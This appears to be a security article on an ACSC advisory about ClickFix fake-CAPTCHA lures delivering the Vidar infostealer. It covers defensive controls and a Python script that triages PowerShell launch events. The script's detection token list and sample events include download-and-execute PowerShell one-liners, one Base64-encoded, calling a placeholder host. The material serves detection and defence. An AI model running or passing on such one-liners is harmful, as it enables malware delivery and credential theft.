The Australian Cyber Security Centre has issued a threat advisory warning organisations about an active ClickFix social engineering campaign delivering the Vidar infostealer to enterprise targets across multiple Australian industry sectors. The advisory provides TTPs and indicators relevant to the campaign, which has been active across English-speaking markets.
How ClickFix Works
ClickFix is a social engineering technique, not a vulnerability. It does not rely on software exploits or browser flaws; it relies on persuading the victim to run a malicious command themselves. The attack flow typically unfolds as follows:
- The user visits a compromised or attacker-controlled website (often reached via a search engine result, malvertising, or a phishing link)
- The page presents a convincing overlay: a fake CAPTCHA verification, a browser "fix required" dialog, or a document rendering failure message
- The overlay instructs the user to press Win+R (or open Terminal on macOS), paste the command that the page's JavaScript has already written to the clipboard, and press Enter
- The pasted command is a one-liner (PowerShell on Windows) that downloads and executes the malware payload
The technique is effective because CAPTCHA verification is a familiar web interaction, and because the user, not the browser, launches the payload: no file is downloaded through the browser, so download warnings and endpoint controls that key on file writes never fire, and the first stage runs as an in-memory script. What does remain is the command line itself, which lands in process-creation logging (Windows Event ID 4688 with command-line auditing, or Sysmon Event ID 1) and is the main detection hook.
Vidar Infostealer Payload
Vidar is a well-established commercial infostealer available as malware-as-a-service. Once executed, it collects:
- Stored browser credentials (Chrome, Edge, Firefox, Brave) including saved passwords and session cookies
- Credit card data stored in browsers
- Cryptocurrency wallet files and seed phrases
- Documents matching specified extensions (PDF, DOC, XLSX) from the user's desktop and documents folder
- Screenshots of the active desktop at time of execution
- System and network information for operator reconnaissance
Vidar exfiltrates collected data to attacker-controlled infrastructure and then self-deletes, making forensic detection difficult after the collection phase.
Defensive Response
User awareness is the primary control. ClickFix cannot succeed if users understand that no legitimate website requires them to open a Run dialog, a terminal, or PowerShell and paste a command. Security awareness training should explicitly cover the ClickFix pattern; a "CAPTCHA" that asks the user to press keys or paste something is the distinguishing indicator.
Technical controls:
- Constrained Language Mode for PowerShell: enforce it through an AppLocker or WDAC (Windows Defender Application Control) policy on endpoints. In Constrained Language Mode, interactive sessions and unsigned scripts lose access to arbitrary .NET types, so a pasted one-liner built on New-Object Net.WebClient fails even though the user started the session. Cmdlet-based downloads such as Invoke-WebRequest still run, so treat this as a mitigation rather than a block. On a test host, $ExecutionContext.SessionState.LanguageMode should return ConstrainedLanguage once the policy applies.
- Disable the Run dialog in managed environments. The Group Policy setting User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu" (registry value NoRun under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer) removes the Win+R path for standard users. It does not stop lure variants that tell the user to open PowerShell or Terminal from the Start menu, so pair it with the monitoring below.
- Monitor for PowerShell invocations whose command line contains IEX, Invoke-Expression, DownloadString or Net.WebClient; these patterns are characteristic of ClickFix payload download one-liners. Decode -EncodedCommand payloads before matching, and enable PowerShell script block logging (Event ID 4104) so the script content is captured even when the launch command is obfuscated.
- Web proxy content filtering: block access to newly registered domains and domains with poor reputation scores. ClickFix infrastructure typically uses recently registered domains with short operational lifespans.
- Endpoint detection: configure EDR rules to flag process creation chains where powershell.exe is a child process of explorer.exe (the parent of anything launched from the Run dialog) or cmd.exe with suspicious command-line arguments.
The ACSC advisory includes specific indicators of compromise. Affected organisations should load the IOCs into endpoint protection block lists and network monitoring rules.
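The command-line and parent-process checks from the monitoring and EDR items above, as an added triage example that is not code from the ACSC advisory or from this article. It runs offline over constructed Sysmon-style process-creation records. The token list extends the page's IEX / Invoke-Expression / DownloadString / Net.WebClient set with assumed extras (Invoke-RestMethod, Invoke-WebRequest, hidden-window flags, Base64 helpers), decodes -EncodedCommand payloads before matching, and grades explorer.exe and cmd.exe parents higher than other parents. Hostnames use the reserved example.invalid domain.

```python
"""Triage of Windows process-creation events for ClickFix-style PowerShell launches.

Added example, not code from the ACSC advisory. The event records are constructed
Sysmon Event ID 1 style dicts (Image, ParentImage, CommandLine); the token list
extends the page's IEX / Invoke-Expression / DownloadString / Net.WebClient set
with assumed additions. The same logic ports to a SIEM query or EDR custom rule.
"""
import base64
import re

# Command-line tokens: the page's four plus assumed additions (matched lower-case).
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "net.webclient",
    "invoke-restmethod", "irm ", "invoke-webrequest", "iwr ",
    "frombase64string", "-w hidden", "windowstyle hidden", "mshta",
)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# The Win+R Run dialog spawns its child under explorer.exe; cmd.exe covers lures
# that say "open a command prompt and paste".
LURE_PARENTS = ("explorer.exe", "cmd.exe")

# -e / -ec / -en / -enc / -encodedcommand: PowerShell accepts any unique prefix.
# Written so that -ExecutionPolicy and -ep do not match.
_ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (Base64 of UTF-16LE) to cmdline,
    so token matching sees the real script rather than an opaque blob."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not a real encoded command; leave as-is
    return f"{cmdline} <decoded:{script}>"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one process-creation event.

    high   : PowerShell under explorer.exe/cmd.exe with download-and-execute tokens
             (the Win+R paste chain ClickFix depends on)
    medium : download-and-execute tokens under any other parent
    none   : everything else, including a bare PowerShell opened from Explorer
    """
    if _basename(event["Image"]) not in POWERSHELL_IMAGES:
        return "none", []
    cmd = decode_encoded_command(event["CommandLine"]).lower()
    reasons = [f"token:{t.strip()}" for t in SUSPICIOUS_TOKENS if t in cmd]
    if not reasons:
        return "none", []
    parent = _basename(event["ParentImage"])
    severity = "high" if parent in LURE_PARENTS else "medium"
    return severity, [f"parent:{parent}"] + reasons


def triage(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Return (severity, command line, reasons) for every event graded above 'none'."""
    out = []
    for ev in events:
        sev, reasons = classify(ev)
        if sev != "none":
            out.append((sev, ev["CommandLine"], reasons))
    return out


# Constructed sample events; example.invalid is a reserved, non-routable name.
_ENC = base64.b64encode("IEX (irm http://example.invalid/x)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/v')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -NoP -ep bypass -enc {_ENC}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"pwsh.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -nop -c \"Invoke-Expression (iwr http://example.invalid/m).Content\""},
]

if __name__ == "__main__":
    for sev, cmd, reasons in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {cmd[:70]}  {reasons}")
```

Run it directly to print the graded hits: the two explorer.exe launches (one plain, one Base64-encoded) come out high, the Word-spawned one medium, and the bare PowerShell and the scheduled backup script are ignored. In production, express the same rule as a SIEM query and join it with script block logs (Event ID 4104), since obfuscated launchers can keep every one of these tokens out of the command line.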